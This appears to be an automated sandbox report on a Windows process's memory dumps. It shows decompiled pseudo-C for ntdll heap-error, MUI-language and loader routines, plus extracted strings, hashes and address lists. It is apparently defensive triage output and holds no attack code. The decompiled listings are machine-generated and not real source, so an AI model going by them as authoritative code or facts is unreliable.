ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 10429BC8

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: c7bb0a5efa387dba9446d0eab515a0822f0aae7ea89c37e683e2a00aaeca51a4
Instruction ID: c97bb177139af4039028b25a2e832b50340d446309299e0715ce11bc39fcb903
Opcode Fuzzy Hash: c7bb0a5efa387dba9446d0eab515a0822f0aae7ea89c37e683e2a00aaeca51a4
Instruction Fuzzy Hash: 6BE086757102016BD7249F68CC85F973BACEF48760F118558B91D6B342C531F911C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 10429BA0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10429BA0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E1042A1A0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x10429ba3
0x10429bba
0x10429bc8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 10429BC8

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: a1e2c12a0ad0a1ebb5a54c05bcfcfad1def85d1d07b610179bad51dd670a9997
Instruction ID: e8a790c109d3244695c66457a60aa58d71e62b4696cf861983c9632dbdd1df53
Opcode Fuzzy Hash: a1e2c12a0ad0a1ebb5a54c05bcfcfad1def85d1d07b610179bad51dd670a9997
Instruction Fuzzy Hash: 7FD012756102147BD620DB98DC85FD7779CDF48660F418165BA1C5B241C531BA10C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 0388967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03889694

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1426ad2883ecd36cd3d067dac858deef5372fbb1b3c29a9f149b9e2377e71421
Instruction ID: ea5fa9e4071b8bdea3815d7b599202c1f7702a53bdaa507cf844fe123995e696
Opcode Fuzzy Hash: 1426ad2883ecd36cd3d067dac858deef5372fbb1b3c29a9f149b9e2377e71421
Instruction Fuzzy Hash: F6B09B719014C5C5EA11E7E04708737790477D0745F1BC0D2D2024751A4778C495F5B5

Uniqueness

Uniqueness Score: -1.00%

Function 02DE0000, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.738776678.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
Instruction ID: 18b5e61e04c7bcae5a7a9f8a09946595db22e2a0f492063f86ebefdf2a899b08
Opcode Fuzzy Hash: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
Instruction Fuzzy Hash: 33D01275914208EFDB04CF54D84589EBBF5EB44320F20C165E914973A0E731AE509A44

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 038FB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 038FB2DC
<unknown>, xrefs: 038FB27E, 038FB2D1, 038FB350, 038FB399, 038FB417, 038FB48E
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 038FB47D
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 038FB38F
The resource is owned exclusively by thread %p, xrefs: 038FB374
This failed because of error %Ix., xrefs: 038FB446
Go determine why that thread has not released the critical section., xrefs: 038FB3C5
The instruction at %p referenced memory at %p., xrefs: 038FB432
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 038FB305
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 038FB3D6
*** Resource timeout (%p) in %ws:%s, xrefs: 038FB352
*** enter .exr %p for the exception record, xrefs: 038FB4F1
*** enter .cxr %p for the context, xrefs: 038FB50D
*** Inpage error in %ws:%s, xrefs: 038FB418
*** An Access Violation occurred in %ws:%s, xrefs: 038FB48F
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 038FB323
read from, xrefs: 038FB4AD, 038FB4B2
an invalid address, %p, xrefs: 038FB4CF
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 038FB476
write to, xrefs: 038FB4A6
The critical section is owned by thread %p., xrefs: 038FB3B9
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 038FB53F
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 038FB314
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 038FB484
The resource is owned shared by %d threads, xrefs: 038FB37E
*** A stack buffer overrun occurred in %ws:%s, xrefs: 038FB2F3
a NULL pointer, xrefs: 038FB4E0
The instruction at %p tried to %s , xrefs: 038FB4B6
*** then kb to get the faulting stack, xrefs: 038FB51C
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 038FB39B

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: a327c29bc29e5744c8ffed3070d1d52d634aca8fbb5a775f0c5b23805d639ed7
Instruction ID: b386daf4044440dea6289e9737678107208b1f0061d7fa42575f84ed41837849
Opcode Fuzzy Hash: a327c29bc29e5744c8ffed3070d1d52d634aca8fbb5a775f0c5b23805d639ed7
Instruction Fuzzy Hash: 0F81D179A80210FFCB22EBD9CC85E6E3B66AF57A56F0440C5F604DF312D3A98551C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 03901C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E03901C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x38248a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0384B150();
				} else {
					E0384B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x393589c);
				E0384B150("Heap error detected at %p (heap handle %p)\n",  *0x39358a0);
				_t27 =  *0x3935898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M03901E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0384B150();
				} else {
					E0384B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0384B150("Error code: %d - %s\n",  *0x3935898);
				_t113 =  *0x39358a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0384B150();
					} else {
						E0384B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0384B150("Parameter1: %p\n",  *0x39358a4);
				}
				_t115 =  *0x39358a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0384B150();
					} else {
						E0384B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0384B150("Parameter2: %p\n",  *0x39358a8);
				}
				_t117 =  *0x39358ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0384B150();
					} else {
						E0384B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0384B150("Parameter3: %p\n",  *0x39358ac);
				}
				_t119 =  *0x39358b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0384B150();
					} else {
						E0384B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x39358b4);
					E0384B150("Last known valid blocks: before - %p, after - %p\n",  *0x39358b0);
				} else {
					_t120 =  *0x39358b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0384B150();
				} else {
					E0384B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0384B150("Stack trace available at %p\n", 0x39358c0);
			}

0x03901c10
0x03901c16
0x03901c1e
0x03901c3d
0x03901c3e
0x03901c20
0x03901c35
0x03901c3a
0x03901c44
0x03901c55
0x03901c5a
0x03901c65
0x03901c67
0x00000000
0x03901c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x03901c67
0x03901cdc
0x03901ce5
0x03901d04
0x03901d05
0x03901ce7
0x03901cfc
0x03901d01
0x03901d0b
0x03901d17
0x03901d1f
0x03901d25
0x03901d30
0x03901d4f
0x03901d50
0x03901d32
0x03901d47
0x03901d4c
0x03901d61
0x03901d67
0x03901d68
0x03901d6e
0x03901d79
0x03901d98
0x03901d99
0x03901d7b
0x03901d90
0x03901d95
0x03901daa
0x03901db0
0x03901db1
0x03901db7
0x03901dc2
0x03901de1
0x03901de2
0x03901dc4
0x03901dd9
0x03901dde
0x03901df3
0x03901df9
0x03901dfa
0x03901e00
0x03901e0a
0x03901e13
0x03901e32
0x03901e33
0x03901e15
0x03901e2a
0x03901e2f
0x03901e39
0x03901e4a
0x03901e02
0x03901e02
0x03901e08
0x00000000
0x00000000
0x03901e08
0x03901e5b
0x03901e7a
0x03901e7b
0x03901e5d
0x03901e72
0x03901e77
0x03901e95

Strings

heap_failure_buffer_overrun, xrefs: 03901C98
heap_failure_invalid_argument, xrefs: 03901CAD
heap_failure_entry_corruption, xrefs: 03901C83
HEAP: , xrefs: 03901C16, 03901C3D, 03901D04, 03901D4F, 03901D98, 03901DE1, 03901E32, 03901E7A
Error code: %d - %s, xrefs: 03901D12
heap_failure_listentry_corruption, xrefs: 03901CD0
heap_failure_block_not_busy, xrefs: 03901CA6
Parameter2: %p, xrefs: 03901DA5
heap_failure_freelists_corruption, xrefs: 03901CC9
heap_failure_buffer_underrun, xrefs: 03901C9F
heap_failure_multiple_entries_corruption, xrefs: 03901C8A
Stack trace available at %p, xrefs: 03901E86
Parameter1: %p, xrefs: 03901D5C
heap_failure_invalid_allocation_type, xrefs: 03901CB4
heap_failure_usage_after_free, xrefs: 03901CBB
heap_failure_lfh_bitmap_mismatch, xrefs: 03901CD7
heap_failure_unknown, xrefs: 03901C75
heap_failure_generic, xrefs: 03901C7C
heap_failure_internal, xrefs: 03901C6E
HEAP[%wZ]: , xrefs: 03901C30, 03901CF7, 03901D42, 03901D8B, 03901DD4, 03901E25, 03901E6D
Heap error detected at %p (heap handle %p), xrefs: 03901C50
Parameter3: %p, xrefs: 03901DEE
heap_failure_virtual_block_corruption, xrefs: 03901C91
Last known valid blocks: before - %p, after - %p, xrefs: 03901E45
heap_failure_cross_heap_operation, xrefs: 03901CC2

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: e597c1540397840e2a9d8a2a83026b40a355ab16cba490638ed19ccfaec23a41
Instruction ID: 773d75c14691d032e377bbcc45d04d8b28484782fa79d7c821e9e844ab47baf0
Opcode Fuzzy Hash: e597c1540397840e2a9d8a2a83026b40a355ab16cba490638ed19ccfaec23a41
Instruction Fuzzy Hash: 1B61A63F515258DFC312EBD8D485E24B3A4EB09A2070A84FEF50ADF781D674E840CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 03853D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E03853D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E03851B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E03851B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E03851B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E03851B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E03851B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L03864620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0388F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E03891370(_t276, 0x3824e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0388BB40(0,  &_v68, _t170);
									if(L038543C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0388BB40(_t257,  &_v68, _t243);
								if(L038543C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E03891370(_t278, 0x3824e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L03864620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0388F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E03891370(_v16, 0x3824e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0388BB40(_t262,  &_v68, _t244);
								if(L038543C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E03891370(_t282, 0x3824e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0388BB40(_t262,  &_v68, _t201);
							if(L038543C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L03864620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0388F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E03891370(_t280, 0x3824e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0388BB40(_t267,  &_v68, _t245);
							if(L038543C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E03891370(_t284, 0x3824e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0388BB40(_t267,  &_v68, _t224);
						if(L038543C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x03853d3c
0x03853d42
0x03853d44
0x03853d46
0x03853d49
0x03853d4c
0x03853d4f
0x03853d52
0x03853d55
0x03853d58
0x03853d5b
0x03853d5f
0x03853d61
0x03853d66
0x038a8213
0x038a8218
0x03854085
0x03854088
0x0385408e
0x03854094
0x0385409a
0x038540a0
0x038540a6
0x038540a9
0x038540af
0x038540b6
0x038540bd
0x038540bd
0x03853d83
0x038a821f
0x038a8229
0x038a8238
0x038a8238
0x038a823d
0x038a823d
0x03853da0
0x03853daf
0x03853db5
0x03853dba
0x03853dba
0x03853dd4
0x03853e94
0x03853eab
0x03853f6d
0x03853f84
0x0385406b
0x0385406b
0x0385406e
0x0385406e
0x03854070
0x03854074
0x038a8351
0x038a8351
0x0385407a
0x0385407f
0x038a835d
0x038a8370
0x038a8377
0x038a8379
0x038a837c
0x038a837c
0x038a835d
0x00000000
0x0385407f
0x03853f8a
0x03853f8d
0x03853f90
0x03853f95
0x038a830d
0x038a830f
0x03853f9b
0x03853fac
0x03853fae
0x03853fb1
0x03853fb1
0x03853fb6
0x038a8317
0x038a831a
0x00000000
0x03853fbc
0x03853fc1
0x03853fc9
0x03853fd7
0x03853fda
0x03853fdd
0x03854021
0x03854021
0x03854029
0x03854030
0x03854044
0x03854046
0x03854046
0x03854044
0x03854049
0x038a8327
0x038a8334
0x038a8339
0x038a833c
0x0385404f
0x0385404f
0x0385404f
0x03854051
0x03854056
0x03854063
0x03854063
0x03854068
0x00000000
0x03854068
0x03853fdf
0x03853fe2
0x03853fe4
0x03853fe7
0x03853fef
0x03854003
0x03854005
0x03854005
0x0385400c
0x03854013
0x03854016
0x03854017
0x0385401b
0x0385401e
0x00000000
0x0385401e
0x03853fb6
0x03853eb1
0x03853eb4
0x03853eb7
0x03853ebc
0x038a82a9
0x038a82ab
0x03853ec2
0x03853ed3
0x03853ed5
0x03853ed8
0x03853ed8
0x03853edd
0x038a82b3
0x038a82b6
0x00000000
0x03853ee3
0x03853ee8
0x03853eed
0x03853ef0
0x03853ef3
0x03853f02
0x03853f05
0x03853f08
0x038a82c0
0x038a82c3
0x038a82c5
0x038a82c8
0x038a82d0
0x038a82e4
0x038a82e6
0x038a82e6
0x038a82ed
0x038a82f4
0x038a82f7
0x038a82f8
0x038a82fc
0x038a82ff
0x038a82ff
0x03853f0e
0x03853f11
0x03853f16
0x03853f1d
0x03853f31
0x038a8307
0x038a8307
0x03853f31
0x03853f39
0x03853f48
0x03853f4d
0x03853f50
0x03853f50
0x03853f53
0x03853f58
0x03853f65
0x03853f65
0x03853f6a
0x00000000
0x03853f6a
0x03853edd
0x03853dda
0x03853ddd
0x03853de0
0x03853de5
0x038a8245
0x03853deb
0x03853df7
0x03853dfc
0x03853dfe
0x03853e01
0x03853e01
0x03853e06
0x038a824d
0x038a824f
0x038a8254
0x00000000
0x03853e0c
0x03853e11
0x03853e16
0x03853e19
0x03853e29
0x03853e2c
0x03853e2f
0x038a825c
0x038a825f
0x038a8261
0x038a8264
0x038a826c
0x038a8280
0x038a8282
0x038a8282
0x038a8289
0x038a8290
0x038a8293
0x038a8294
0x038a8298
0x038a829b
0x038a829b
0x03853e35
0x03853e38
0x03853e3d
0x03853e44
0x03853e58
0x038a82a3
0x038a82a3
0x03853e58
0x03853e60
0x03853e6f
0x03853e74
0x03853e77
0x03853e77
0x03853e7a
0x03853e7f
0x03853e8c
0x03853e8c
0x03853e91
0x00000000
0x03853e91

Strings

Kernel-MUI-Language-SKU, xrefs: 03853F70
Kernel-MUI-Language-Allowed, xrefs: 03853DC0
Kernel-MUI-Language-Disallowed, xrefs: 03853E97
WindowsExcludedProcs, xrefs: 03853D6F
Kernel-MUI-Number-Allowed, xrefs: 03853D8C

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 667bb93b7623744c10541a3ca79e4a2be0306f5ce848f35e62ecef7e17109815
Instruction ID: efef24eb22a6c05d0f81e7c701cf4eea1ee5bd02fb99233af9856f375342b3dd
Opcode Fuzzy Hash: 667bb93b7623744c10541a3ca79e4a2be0306f5ce848f35e62ecef7e17109815
Instruction Fuzzy Hash: C2F11B76D10619EFDF11DFD9C980AEEBBB9EF48650F14009AE905EB210D7749A41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03878E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E03878E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x393d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x3938464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x3935780 & 0x00000003) != 0) {
							E038C5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x3935780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0388B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x3937984; // 0x3152c58
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x3938464; // 0x73b80110
